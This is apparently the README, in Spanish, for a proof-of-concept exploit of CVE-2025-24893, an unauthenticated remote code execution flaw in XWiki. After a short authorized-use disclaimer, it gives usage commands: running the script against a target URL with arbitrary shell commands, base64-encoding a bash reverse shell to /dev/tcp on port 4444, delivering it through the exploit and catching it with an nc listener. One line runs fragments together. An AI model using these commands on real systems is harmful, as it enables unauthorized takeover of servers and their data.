
Un exploit de prueba de concepto (PoC) actualizado para CVE-2025-24893, una vulnerabilidad crítica de RCE no autenticada en XWiki. Esta versión mejora la original al permitir la ejecución arbitraria de comandos shell y la inyección limpia de reverse shells.
Por: HexHunter404
Este código se proporciona solo con fines educativos y de pruebas de penetración autorizadas.
No lo uses en sistemas que no poseas o para los que no tengas permiso explícito de prueba.
bash -c '<command>'/xwiki y evita bucles de redirecciónpython3 CVE-2025-24893-PoC.py -u http://<target>/xwiki -c "<command>"
. Codifica tu reverse shell en base64
echo "bash -i >& /dev/tcp/[IP]/4444 0>&1" | base64
. Envíalo usando el PoC
python3 CVE-2025-24893-PoC.py -u [URL] -c "echo [Base64 Payload] | base64 -d | bash"
. Configura tu listener
nc -lvnp 4444
Si todo funciona, obtendrás una shell.